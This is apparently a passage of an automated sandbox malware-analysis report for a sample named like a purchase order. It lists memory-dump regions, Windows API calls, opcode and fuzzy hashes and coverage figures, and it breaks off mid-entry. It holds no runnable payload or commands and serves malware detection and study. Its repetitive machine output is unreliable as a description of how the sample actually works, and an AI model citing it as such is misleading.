                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 05BF6998
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00FC4D42
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515488004.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_fc0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00FC4D42
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515488004.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_fc0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515095677.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_f6d000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.514983770.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_f5d000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515095677.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_f6d000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.514983770.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_f5d000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage: 17.3%
                                                  Dynamic/Decrypted Code Coverage: 100%
                                                  Signature Coverage: 0%
                                                  Total number of Nodes: 60
                                                  Total number of Limit Nodes: 1

                                                  Control-flow Graph
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 01276C91
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355346983.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_1270000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 01276C91
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355346983.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_1270000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0127DF91
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355346983.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_1270000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 08CD906D
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.363626002.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_8cd0000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8
                                                  • API String ID: 0-4194326291
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4
                                                  • API String ID: 0-4088798008
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "
                                                  • API String ID: 0-123907689
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8
                                                  • API String ID: 0-4194326291
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b3694d5847777ec182a1944a318b9df9d6214ef2a45fc20678bdd2338ddbf084
                                                  • Instruction ID: 12a1a6179e8dd80be952d72dfaa5d85e5bcf0f95b2aa8de3a73a09fc4579a12e
                                                  • Opcode Fuzzy Hash: b3694d5847777ec182a1944a318b9df9d6214ef2a45fc20678bdd2338ddbf084
                                                  • Instruction Fuzzy Hash: EF418D31E042188BDB38FBB4D4947FDBAB6EF88358F184529D506AB380DB355985CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f2ed482e1fe690a42bc57fb895e55ec00f8cec3e0dcdf092d5167bbdfb23d40e
                                                  • Instruction ID: e9d828b67f70caf3e1b238b73efe78d5f2e93c6b372e4641ff62e035f91b8fc8
                                                  • Opcode Fuzzy Hash: f2ed482e1fe690a42bc57fb895e55ec00f8cec3e0dcdf092d5167bbdfb23d40e
                                                  • Instruction Fuzzy Hash: 17312335A002099FDB04EFB4D8499EEBBB6EF89308F144219F502BB754DF34A949CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 286577980cd95f7cd9d6d9c7c7168e9b69de1ff11399194f5fcce155e5bb1b32
                                                  • Instruction ID: d5e5854fa748b9e1544e4a5abca0eef91b6c846d67d857f306e046bcd2e82679
                                                  • Opcode Fuzzy Hash: 286577980cd95f7cd9d6d9c7c7168e9b69de1ff11399194f5fcce155e5bb1b32
                                                  • Instruction Fuzzy Hash: DB31E930204700EFE734EF29D489E3AB3E2FB85200B994E6AD997CB660D771E8448F51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c727e6c3ffc711a53c078a7e0db93240c405cbf227c61b2dac7da780be58f3f
                                                  • Instruction ID: 6691a5640442b5a6609050627655449c1696b717b032bad5d1c685d6b3ecc139
                                                  • Opcode Fuzzy Hash: 2c727e6c3ffc711a53c078a7e0db93240c405cbf227c61b2dac7da780be58f3f
                                                  • Instruction Fuzzy Hash: 5E41D0B1D04348CBDB24DFA9C984ADEBBB5BF48314F258029D509BB344D7756A8ACF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91ec664282f5ddc59467c3ebfb6b78a735b7f6260e359de3087b95be6e3e8190
                                                  • Instruction ID: 5ba1643c063cd94e16eef334237997da2632e8ab6c4978f492e08574f1647631
                                                  • Opcode Fuzzy Hash: 91ec664282f5ddc59467c3ebfb6b78a735b7f6260e359de3087b95be6e3e8190
                                                  • Instruction Fuzzy Hash: 0B41AFB0D143589BDB24DFD9C884ADEFBB1BF88314F24822AE418BB254D7746846CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 59d6d9c1d68f7c43f8debe01a68233cc0350fe84fc71de7b5f04318f6b36e13c
                                                  • Instruction ID: 2127f2fb42145d895a22b71d7714a837d45eb8f1b6bf08096a85cc35d79c48f4
                                                  • Opcode Fuzzy Hash: 59d6d9c1d68f7c43f8debe01a68233cc0350fe84fc71de7b5f04318f6b36e13c
                                                  • Instruction Fuzzy Hash: 9431EA35A20219DFCB14EFA9D895DBDB7B5FF88700F1145AAE915AB361CB30A904CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 420430afdb3978bfed1fc5819a645285c169069a3bdd6340ecbbc4a14c87c0fe
                                                  • Instruction ID: 4ddc416a86af85426c198f1e67cc4ed58be8ec42459c5261032552121708cab2
                                                  • Opcode Fuzzy Hash: 420430afdb3978bfed1fc5819a645285c169069a3bdd6340ecbbc4a14c87c0fe
                                                  • Instruction Fuzzy Hash: 7831F132910B09DECB01AFA8C8548D9F771FF95300B118B5AE9596B221FB30E6D5CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 483eeaa70ce27f21d96776f5fcac36fe09f557ae1a37695149510050c4ace6a8
                                                  • Instruction ID: 4b81dd355b9f4993a97ceedf4472fe575fc241de7c2f2d594ad18ce47a160a94
                                                  • Opcode Fuzzy Hash: 483eeaa70ce27f21d96776f5fcac36fe09f557ae1a37695149510050c4ace6a8
                                                  • Instruction Fuzzy Hash: 2C2102307106108FEB14BB39D459B3F769BEBC9718F04482AE142DB7C5CEB9980287D2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355056274.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_117d000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d5084ac62fb39a6a1bececa943af702cd864bb9e5f0c49b52c2fb15ce91b9c7f
                                                  • Instruction ID: 33115977ca9774358b9f99634d3841061847923cdee9bc133cb70bf40864304a
                                                  • Opcode Fuzzy Hash: d5084ac62fb39a6a1bececa943af702cd864bb9e5f0c49b52c2fb15ce91b9c7f
                                                  • Instruction Fuzzy Hash: 5B21D6716042489FDF09DF94E5C0B26BB75FF88328F24C569E9094B346C336D846CA62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355056274.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_117d000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b978dca3b4c40174c5d8241af5e2172b23734dfb61071b8e0d40395c50d7fbed
                                                  • Instruction ID: 49a83c08e2d1755c694d9325e6a19f7195d729e8462a1c6f023e06c10a62a596
                                                  • Opcode Fuzzy Hash: b978dca3b4c40174c5d8241af5e2172b23734dfb61071b8e0d40395c50d7fbed
                                                  • Instruction Fuzzy Hash: 49210375608248DFCF1ACF54E9C0B26BB75EF88358F24C569D9094B346C33AD846CA62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cdfda08deed372d89625dc274f7d661179a8f7e10fc05bb2c19a239d1547d2eb
                                                  • Instruction ID: dcc3c4492fddaff7e5dc8e7dce86b2e150cdd1c1a4908f0853d398e7f0af60c4
                                                  • Opcode Fuzzy Hash: cdfda08deed372d89625dc274f7d661179a8f7e10fc05bb2c19a239d1547d2eb
                                                  • Instruction Fuzzy Hash: BF314C74A052188FD765EB28D990BAAB7F6FB4E304F1090D8E44DA7785CB309E818F51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49a5b1f1be0a9edd1daa7ac40d9357b26327c018455f8f68cb47ad621aa4cedd
                                                  • Instruction ID: b2404f77a275c5674311c03b535b793229033ba1d7196065cc7fff83eb0f1699
                                                  • Opcode Fuzzy Hash: 49a5b1f1be0a9edd1daa7ac40d9357b26327c018455f8f68cb47ad621aa4cedd
                                                  • Instruction Fuzzy Hash: 771190307106148FEB14BB38D459B3F729BEBC9718F04482AE142DB795CEB5E80297D5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4bdc1b7f2e2056325987b3793837ddbf0816a10dc95bb4aeff825925ce6f79e
                                                  • Instruction ID: c316a1f731e31b3c49ba7232acfcd72e2be736c43a4e0b772e647fc3993eb230
                                                  • Opcode Fuzzy Hash: c4bdc1b7f2e2056325987b3793837ddbf0816a10dc95bb4aeff825925ce6f79e
                                                  • Instruction Fuzzy Hash: 6411EC323042455FCF256F65DC4477B7BAAAF85218F188457F609C6182C77ACC61DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355056274.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_117d000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f2204d2cf2a3e74b26c8ec0a8f92fc382b49f3d85920b294365317420d52484c
                                                  • Instruction ID: 82a3b844397f3a45e173015758335343cfb8ebc1a5360b41e38085cf39d4afca
                                                  • Opcode Fuzzy Hash: f2204d2cf2a3e74b26c8ec0a8f92fc382b49f3d85920b294365317420d52484c
                                                  • Instruction Fuzzy Hash: 0421BE354083848FCB17CF24D990B15BF71EF46214F28C1EAC8488B267C33A980ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0124b7008844c8ebe1c3e316e49c952ad5af5891de35f59bca28b2aad5d2d8fb
                                                  • Instruction ID: 2364ce20d7dbe86c974c4abbc78e3c971a6299496085e48e1b370f103dd3bfc0
                                                  • Opcode Fuzzy Hash: 0124b7008844c8ebe1c3e316e49c952ad5af5891de35f59bca28b2aad5d2d8fb
                                                  • Instruction Fuzzy Hash: 4821E4B59043089FCB14DF99D984A9EFBF4FF49224F10842AE915A7240C378A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b42d57680a7e4fc4de407c1c2f2c86d3fec80ec276792ce874eb6b9986f04bc
                                                  • Instruction ID: f629ab47d1be03775cdf0f9b166df17e8c7198a1c9e88164ba814c6b9f006587
                                                  • Opcode Fuzzy Hash: 4b42d57680a7e4fc4de407c1c2f2c86d3fec80ec276792ce874eb6b9986f04bc
                                                  • Instruction Fuzzy Hash: 9821D6B59043489FCB10DF99D984BDEBBF4FB49324F108429E959B7240C378A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.355056274.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_117d000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ec00427063a39186f2fb4650df0103d6deb5ba7185f4ec336243a5f515f8492
                                                  • Instruction ID: 0b0394adfb19374680ef08e53a3864f9023dc023adb9bec4dc3a0ec5795bf30e
                                                  • Opcode Fuzzy Hash: 1ec00427063a39186f2fb4650df0103d6deb5ba7185f4ec336243a5f515f8492
                                                  • Instruction Fuzzy Hash: 4611A975904284DFCF16CF54D5C0B15BBB1FF84224F28C6A9D8494B756C33AD44ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 220ad939152199b7593f32cdbb340ded0c3ccb3eae3ab44699437ba4725c49c5
                                                  • Instruction ID: 3141b22e5e3a313af46335fbc8772e9e9a90691510b5912ca27995d2a7a8c253
                                                  • Opcode Fuzzy Hash: 220ad939152199b7593f32cdbb340ded0c3ccb3eae3ab44699437ba4725c49c5
                                                  • Instruction Fuzzy Hash: 8B11E2B5D046089FCB20DF9AD544B9EFBF4EB49224F14841AE855B7300D378A945CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 123d3e51754d87b4fc783ad3cb86633aecee9807ba822e827d952a3f75070b4e
                                                  • Instruction ID: be485c8b76f6ed31c1bb8903b048ff471496b6fa2bf8ed25162d7309a5669547
                                                  • Opcode Fuzzy Hash: 123d3e51754d87b4fc783ad3cb86633aecee9807ba822e827d952a3f75070b4e
                                                  • Instruction Fuzzy Hash: E211C0703143115BD654A728E0197BB72C6AB8530CF10891DD189CF7C2CFF6698A57E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b97b2bd9df4d018256c7981bb8216ea891212eb3f41764d9b81a05542c4d549f
                                                  • Instruction ID: dc38a05e74496d058a9e672787405cd85fb042bee7366e40cf7972e00ad59592
                                                  • Opcode Fuzzy Hash: b97b2bd9df4d018256c7981bb8216ea891212eb3f41764d9b81a05542c4d549f
                                                  • Instruction Fuzzy Hash: 0521A574A04228CFDB64EF24C888BA9B7F1FB09315F5191E9D44DA7744DB309A85CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
